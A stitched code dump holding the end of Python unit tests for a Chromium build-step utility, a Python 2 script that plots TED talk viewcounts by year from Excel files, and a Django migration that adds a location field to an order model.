gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n\n upper_bound_target = IsolatedTarget.Create(\n build_id, luci_name, bucket_name, master_name, builder_name,\n gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(\n master_name, builder_name, target_name,\n requested_commit_position))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingWithinRange(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n\n mocked_get_build_info.side_effect = [\n invalid_build_100,\n invalid_build_101,\n valid_build_102,\n ]\n\n self.assertEqual(\n valid_build_102,\n 
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,\n 2))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n\n mocked_get_build_info.side_effect = [\n invalid_build_100,\n invalid_build_101,\n valid_build_102,\n ]\n\n self.assertIsNone(\n step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,\n 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n\n mocked_get_build_info.side_effect = [\n invalid_build_100,\n invalid_build_99,\n valid_build_98,\n ]\n\n self.assertEqual(\n valid_build_98,\n step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,\n 2))\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', lower_bound_build_number, 100, 10)\n\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuildInValid(\n self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', lower_bound_build_number, 100, 10)\n\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuild(self, *_):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', None, upper_bound_build_number, 10000)\n self.assertEqual(upper_bound_build_number, lower_bound.build_number)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_):\n upper_bound_build_number = 5\n lower_bound, upper_bound = 
step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', None, upper_bound_build_number, 10000)\n\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', None, upper_bound_build_number, 50)\n\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):\n upper_bound_build_number = 4\n lower_bound_build_number = 1\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)\n\n self.assertEqual(20, lower_bound.commit_position)\n self.assertEqual(20, upper_bound.commit_position)\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n\n @mock.patch.object(\n waterfall_config, 'StepIsSupportedForMaster', return_value=False)\n def testStepNotSupportedByFindit(self, _):\n self.assertFalse(\n step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'step', 'm'))\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(\n step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(\n waterfall_config, 'StepIsSupportedForMaster', return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(\n step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n\n @mock.patch.object(\n waterfall_config, 'StepIsSupportedForMaster', return_value=True)\n def testIsStepSupportedByFinditGtests(self, _):\n self.assertTrue(\n step_util.IsStepSupportedByFindit(\n GtestTestResults(None), 'browser_tests', 'm'))\n\n @parameterized.expand([\n ({\n 'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,\n 'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA\n },),\n ({\n 'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,\n 'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA\n },),\n ({\n 'step_log_return': None,\n 'expected_step_metadata': None\n },),\n ({\n 'step_log_return': None,\n 'expected_step_metadata': None\n },),\n ])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value='step')\n @mock.patch.object(\n logdog_util, '_GetStreamForStep', return_value='log_stream')\n @mock.patch.object(\n logdog_util,\n 
'GetStepLogLegacy',\n return_value=json.dumps(wf_testcase.SAMPLE_STEP_METADATA))\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n def testLegacyGetStepMetadata(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)\n def testLegacyGetStepMetadataStreamNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(\n step_util,\n 'GetStepLogForLuciBuild',\n return_value=wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual(\n 'log1/nlog2',\n step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None))\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(\n step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. 
Data is: log.')\n\n @mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)\n def testGetStepLogForLuciBuildError(self, _):\n self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's', None))\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build, mock_get_log,\n _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(\n step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n\n @mock.patch.object(\n step_util, '_ParseStepLogIfAppropriate', return_value='log')\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl', return_value='log')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuild(self, mock_get_build, mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertEqual(\n 'log',\n step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))\n mock_get_log.assert_called_once_with('view_url', None)\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(\n Build(), 'full_step_name', 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log'))\n\n @parameterized.expand([\n (True, 'step_name', 'view_url', 'view_url_partial_match'),\n (False, 'step_name', 'view_url', None),\n ])\n def testGetStepLogViewUrlPartialMatching(self, partial_match, full_step_name,\n expected_url_in_build1,\n expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n 
mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(\n expected_url_in_build1,\n step_util._GetStepLogViewUrl(\n mock_build1, full_step_name, 'log', partial_match=partial_match))\n\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(\n expected_url_in_build2,\n step_util._GetStepLogViewUrl(\n mock_build2, full_step_name, 'log', partial_match=partial_match))\n\n @mock.patch.object(\n step_util,\n 'GetWaterfallBuildStepLog',\n return_value={'canonical_step_name': 'unsupported_step1'})\n def testStepIsSupportedForMaster(self, _):\n master_name = 'master1'\n builder_name = 'b'\n build_number = 123\n step_name = 'unsupported_step1 on master1'\n self.assertFalse(\n step_util.StepIsSupportedForMaster(master_name, builder_name,\n build_number, step_name))\n\n def testStepIsSupportedForMasterCompile(self):\n master_name = 'm'\n builder_name = 'b'\n build_number = 123\n step_name = 'compile'\n self.assertTrue(\n step_util.StepIsSupportedForMaster(master_name, builder_name,\n build_number, step_name))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog')\n def testLegacyGetStepMetadataCached(self, mock_fn):\n mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]\n # Returns the invalid step_metadata but not cache it.\n self.assertEqual(\n 'invalid',\n step_util.LegacyGetStepMetadata('m', 'b', 201,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n # Returns the valid step_metadata and cache it.\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.LegacyGetStepMetadata('m', 'b', 201,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.LegacyGetStepMetadata('m', 'b', 201,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n # Returns the invalid step_metadata but not cache it.\n self.assertEqual(None,\n step_util.GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n # Returns the valid step_metadata and cache it.\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(\n step_util,\n 'LegacyGetStepMetadata',\n return_value={'canonical_step_name': 'step_name'})\n def testLegacyGetCanonicalStep(self, _):\n self.assertEqual(\n 'step_name',\n step_util.LegacyGetCanonicalStepName('m', 'b', 200,\n 'step_name on a platform'))\n\n @parameterized.expand([({\n 'canonical_step_name': 'step_name'\n }, 'step_name'), (None, 'step_name'), ({\n 'a': 'b'\n }, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepName(self, step_metadata, expected_canonical_step,\n mocked_get_step):\n mocked_get_step.return_value = step_metadata\n self.assertEqual(\n 
expected_canonical_step,\n step_util.GetCanonicalStepName(123, 'step_name (with patch)'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(\n step_util,\n 'LegacyGetStepMetadata',\n return_value={'isolate_target_name': 'browser_tests'})\n def testLegacyGetIsolateTargetName(self, _):\n self.assertEqual(\n 'browser_tests',\n step_util.LegacyGetIsolateTargetName(\n 'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(\n None,\n step_util.LegacyGetIsolateTargetName(\n 'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(\n step_util, 'LegacyGetStepMetadata', return_value={'a': 'b'})\n def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):\n self.assertEqual(\n None,\n step_util.LegacyGetIsolateTargetName(\n 'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @parameterized.expand([({\n 'isolate_target_name': 'isolate_target'\n }, 'isolate_target'), (None, None), ({\n 'a': 'b'\n }, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata, expected_isolate_target,\n mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target,\n step_util.GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform,\n step_util.GetOS(123, 'builder_name', 'step_name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOSPartialMatch(self, mock_get_step_metadata):\n step_util.GetOS(123, 'builder_name', 'step_name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetOS(123, 'builder_name', 'step_name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(\n step_util,\n 'GetStepMetadata',\n return_value=wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform',\n step_util.GetOS(123, 'builder_name', 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform',\n step_util.GetOS(123, 'builder_name', 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n 
build.steps.extend([step])\n\n self.assertEqual((start_time, end_time),\n step_util.GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-ids": [
26,
32,
43,
49,
55
]
}
|
[
26,
32,
43,
49,
55
] |
import datetime
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
import xlrd
from pandas import *
from xlrd import xldate
#since I messed up when first scraping the data, I have the dates and viewcounts in separate files
#need to create a dictionary of 'author-title':[viewcount, date]
viewcount_dict = {}
#to get the viewcount
workbook = xlrd.open_workbook('ted_info.xlsx')
worksheet = workbook.sheet_by_name('Sheet1')
num_rows = worksheet.nrows - 1
num_cells = worksheet.ncols - 1
curr_row = 0
while curr_row < num_rows:
curr_row += 1
row = worksheet.row(curr_row)
print 'Row:', curr_row
author_name = worksheet.cell_value(curr_row, 0)
talk_title = worksheet.cell_value(curr_row, 3)
viewcount = worksheet.cell_value(curr_row, 5)
if author_name + ":" + talk_title in viewcount_dict:
print author_name + ":" + talk_title
        raise Exception("error in datafile, there is a duplicate")
viewcount_dict[author_name + ":" + talk_title] = [viewcount]
#the following prints each cell value and cell type
#curr_cell = -1
#while curr_cell < num_cells:
#curr_cell += 1
# Cell Types: 0=Empty, 1=Text, 2=Number, 3=Date, 4=Boolean, 5=Error, 6=Blank
#cell_type = worksheet.cell_type(curr_row, curr_cell)
#cell_value = worksheet.cell_value(curr_row, curr_cell)
#print ' ', cell_type, ':', cell_value
#to get the year
workbook = xlrd.open_workbook('ted_info_name_title_date.xlsx')
worksheet = workbook.sheet_by_name('Sheet1')
num_rows = worksheet.nrows - 1
num_cells = worksheet.ncols - 1
curr_row = 0
while curr_row < num_rows:
curr_row += 1
row = worksheet.row(curr_row)
author_name = worksheet.cell_value(curr_row, 0)
talk_title = worksheet.cell_value(curr_row, 1)
date = worksheet.cell_value(curr_row, 2)
date_as_datetime = xldate.xldate_as_tuple(date, workbook.datemode)
year, month, day, hour, minute, second = date_as_datetime
print year
try:
viewcount_dict[author_name + ":" + talk_title].append(year)
except:
#author/title not in dictionary (because it was one of the weirdly formatted pages)
print row
continue
print len(viewcount_dict)
year_viewcount_dict = {}
for year in range(2006,2016):
#create a dictionary for each year due to the input of the violin plot
year_viewcount_dict[year] = {}
year_viewcount_dict["All"] = {} #also have one that includes all years
for key, value in viewcount_dict.iteritems():
#print value
try:
year = value[1]
except:
continue
#this means that it did not have a year, likely because that author/talk was not in the date file
viewcount = value[0]
year_viewcount_dict[year][len(year_viewcount_dict[value[1]])] = viewcount
year_viewcount_dict["All"][len(year_viewcount_dict[value[1]])] = viewcount
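    # note (editorial): the "All" dict is keyed by the per-year dict length, so keys collide
    # across years and earlier years' viewcounts get overwritten here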
list_of_counts = [Series(year_viewcount_dict[year]) for year in ["All"] + range(2006,2016)] #turn into data type required for violinplot
labels = ["All"] + [str(year) for year in range(2006, 2016)] #note that they started in June of 2006 and that this data only includes up to April 2015
plt.rcParams['figure.subplot.bottom'] = 0.23 # keep labels visible
fig = plt.figure()
ax = fig.add_subplot(111)
sm.graphics.violinplot(list_of_counts, ax=ax, labels=labels,
plot_opts={'cutoff_val':5, 'cutoff_type':'abs',
'label_fontsize':'small'})
ax.set_xlabel("Year")
ax.set_yscale("log") #set to log scale because of the wide range of viewcounts
ax.set_ylabel("Viewcount of talks (log scale)")
#plt.show()
plt.savefig('violinplot_viewcounts.png', bbox_inches='tight')
|
normal
|
{
"blob_id": "6ece524c82521b175cc7791e22c8249dd24dc714",
"index": 2281,
"step-1": "import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as sm\nimport xlrd\nfrom pandas import *\nfrom xlrd import xldate\n\n\n#since I messed up when first scraping the data, I have the dates and viewcounts in separate files\n\n#need to create a dictionary of 'author-title':[viewcount, date]\nviewcount_dict = {}\n\n\n#to get the viewcount\nworkbook = xlrd.open_workbook('ted_info.xlsx')\nworksheet = workbook.sheet_by_name('Sheet1')\nnum_rows = worksheet.nrows - 1\nnum_cells = worksheet.ncols - 1\ncurr_row = 0\nwhile curr_row < num_rows:\n curr_row += 1\n row = worksheet.row(curr_row)\n print 'Row:', curr_row\n\n author_name = worksheet.cell_value(curr_row, 0)\n talk_title = worksheet.cell_value(curr_row, 3)\n viewcount = worksheet.cell_value(curr_row, 5)\n\n if author_name + \":\" + talk_title in viewcount_dict:\n print author_name + \":\" + talk_title\n raise \"error in datafile, there is a duplicate\"\n\n viewcount_dict[author_name + \":\" + talk_title] = [viewcount]\n\n #the following prints each cell value and cell type\n #curr_cell = -1\n #while curr_cell < num_cells:\n #curr_cell += 1\n # Cell Types: 0=Empty, 1=Text, 2=Number, 3=Date, 4=Boolean, 5=Error, 6=Blank\n #cell_type = worksheet.cell_type(curr_row, curr_cell)\n #cell_value = worksheet.cell_value(curr_row, curr_cell)\n #print ' ', cell_type, ':', cell_value\n\n\n#to get the year\nworkbook = xlrd.open_workbook('ted_info_name_title_date.xlsx')\nworksheet = workbook.sheet_by_name('Sheet1')\nnum_rows = worksheet.nrows - 1\nnum_cells = worksheet.ncols - 1\ncurr_row = 0\nwhile curr_row < num_rows:\n curr_row += 1\n row = worksheet.row(curr_row)\n\n author_name = worksheet.cell_value(curr_row, 0)\n talk_title = worksheet.cell_value(curr_row, 1)\n date = worksheet.cell_value(curr_row, 2)\n date_as_datetime = xldate.xldate_as_tuple(date, workbook.datemode)\n year, month, day, hour, minute, second = date_as_datetime\n print year\n\n try:\n viewcount_dict[author_name + \":\" + talk_title].append(year)\n except:\n #author/title not in dictionary (because it was one of the weirdly formatted pages)\n print row\n continue\n\n\nprint len(viewcount_dict)\n\n\nyear_viewcount_dict = {}\nfor year in range(2006,2016):\n #create a dictionary for each year due to the input of the violin plot \n year_viewcount_dict[year] = {}\nyear_viewcount_dict[\"All\"] = {} #also have one that includes all years\n\nfor key, value in viewcount_dict.iteritems():\n #print value\n try:\n year = value[1]\n except:\n continue\n #this means that it did not have a year, likely because that author/talk was not in the date file\n viewcount = value[0]\n year_viewcount_dict[year][len(year_viewcount_dict[value[1]])] = viewcount\n year_viewcount_dict[\"All\"][len(year_viewcount_dict[value[1]])] = viewcount\n\nlist_of_counts = [Series(year_viewcount_dict[year]) for year in [\"All\"] + range(2006,2016)] #turn into data type required for violinplot\n\n\nlabels = [\"All\"] + [str(year) for year in range(2006, 2016)] #note that they started in June of 2006 and that this data only invludes up to april 2015\nplt.rcParams['figure.subplot.bottom'] = 0.23 # keep labels visible\nfig = plt.figure()\nax = fig.add_subplot(111)\nsm.graphics.violinplot(list_of_counts, ax=ax, labels=labels,\n plot_opts={'cutoff_val':5, 'cutoff_type':'abs',\n 'label_fontsize':'small'})\nax.set_xlabel(\"Year\")\nax.set_yscale(\"log\") #set to log scale because the range of viewcounts\nax.set_ylabel(\"Viewcount of talks (log 
scale)\")\n\n#plt.show()\nplt.savefig('violinplot_viewcounts.png', bbox_inches='tight')\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Generated by Django 3.0.1 on 2020-02-01 16:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shopUser', '0024_order_contact'),
]
operations = [
migrations.AddField(
model_name='order',
name='location',
field=models.CharField(default='dhaka,Mohammadpur', max_length=200),
preserve_default=False,
),
]
|
normal
|
{
"blob_id": "0a5570ef17efa26ef6317930df616c8326f83314",
"index": 2936,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('shopUser', '0024_order_contact')]\n operations = [migrations.AddField(model_name='order', name='location',\n field=models.CharField(default='dhaka,Mohammadpur', max_length=200),\n preserve_default=False)]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('shopUser', '0024_order_contact')]\n operations = [migrations.AddField(model_name='order', name='location',\n field=models.CharField(default='dhaka,Mohammadpur', max_length=200),\n preserve_default=False)]\n",
